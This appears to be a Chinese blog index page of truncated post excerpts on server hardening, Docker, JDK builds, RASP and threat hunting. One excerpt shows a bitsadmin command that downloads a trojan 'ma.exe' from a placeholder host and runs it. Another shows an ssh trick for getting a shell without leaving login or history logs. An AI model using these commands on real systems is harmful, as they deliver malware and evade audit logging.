Linux云主机加固系列之：Tomcat配置安全优化 阅读时间：2分钟 阅读对象：网络运维和网络管理人员 使用场景：用到tomcat应用 看完这篇文章，你能得到什么？ 知道在linux情况下如何进行tomcat安...

为了更好的做未来升级（sonarqube升级比较频繁）所以使用两个容器连接 插件和数据库文件也使用宿主文件系统 创建/Users/k4n5ha0/sonarqube/data/postgresql/data 文件夹作为pg数据库文件储存...

由于平时一直使用docker build 命令才生成一个镜像，有时候由于代码跟新频繁就会产生很多的none的image，最近想着清除一下。 于是就写了以下脚本： docker ps -a | grep "Exited" | awk '{p...

{ :user { :mirrors { "central" { :name "aliyun" :url "https://maven.aliyun.com/nexus/content/groups/public/" } ......

export JAVA_HOME=/home/ubuntu/jdk-11.0.1 export PATH=$JAVA_HOME/bin:$PATH /etc/profile 设置好就行了...

<servlet> <servlet-name>jsp</servlet-name> <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class> <init-param> <param-name>fork</param-name> ......

pkill -9 java 或者 ps -ef | grep java | grep -v grep | cut -c 9-15 | xargs kill -9 运行这条命令将会杀掉所有含有关键字"java"的进程 下面将这条命令作一下简单说明： 管道符"|"用来隔开...

最近几周一直在研究java的反序列化漏洞相关问题 我们先来看看这个著名的类和其中的那个方法了 对没错 就是这个大名鼎鼎的readObject方法 一旦黑客发现了"可乘之机" 就会构造一个paylaods比如...

本文环境 ubuntu 16.04 全新安装虚拟机 apt -y install mercurial # 安装版本控制 add-apt-repository ppa:openjdk-r/ppa apt-get update # 安装jdk7 编译jdk8 需要jdk7 apt -y install ope...

什么是威胁狩猎 威胁狩猎也被叫做威胁搜索、网络狩猎或者网络威胁搜索，他不同于apt攻击或者红蓝军渗透测试这类模拟攻击者攻寻找黑入IT设施漏洞的行为。 在威胁狩猎中，安全专家们会打破常规...

设立公司黑名单ip库 设立很多伪装性很强的二级域名 有人访问这些二级域名就把ip拉入黑名单库

# windows # 首先需要准备一个木马程序ma.exe bitsadmin /transfer myjob1/download /priority normal http://www.xxx.com/ma.exe c:\windows\temp\ma.exe c:\windows\temp\ma.exe # ma.exe保...

import scrapy from scrapy.spiders import Spider def parse_response(response, ip_in): title = response.xpath("/html/head/title").extract()[0] filename = 'quotes.txt' with open......

最近st2 框架又出漏洞了 一大堆java被执行命令了 这里我提一个解决方案 可以适当缓解服务端被漏洞进行rce漏洞的问题 LD_PRELOAD替换进程底层函数 首先请看这篇文章 如果是某位c++的大佬 您老...

ssh -T root@127.0.0.1 /bin/bash -i #-T 表示不分配伪终端 （正常的会话，在分配伪终端之后才会调用utmp和wtmp的日志接口） # /usr/bin/bash -i 表示在登录之后 调用bash命令 #不留下.bash...

这段时间看了百度的openrasp的源代码和相关资料 (地址:https://rasp.baidu.com) 在实施的过程中还是遇到了很多的阻力,所以开始自己调研相关的技术方案 我觉得能在研发阶段就能使程序员适应安...

首先在springboot的pom.xml中的插件中增加一个用于调试的插件 <build> <plugins> <plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-m......

编译mybatis需要先编译一个mybatis的parent项目(对应的spring boot 2.0.2的mybatis-spring-boot-starter的mybatis版本) 本文举例为mybatis 3.4.6(本文当前的springboot 依赖3.4.6 可以在ide...

<?php function read_all($dir) { if (!is_dir($dir)) return false; $handle = opendir($dir); if ($handle) { while (($fl = readdir($handle)) !== false) { $temp = $......

echo `openssl rand -base64 50 | tr -dc A-Z-a-z-0-9 | head -c${1:-32}` # 只会出现大小写和数字 长度控制在32位 # 第一个50代表足够的原始长度 第二个32代表长度为32......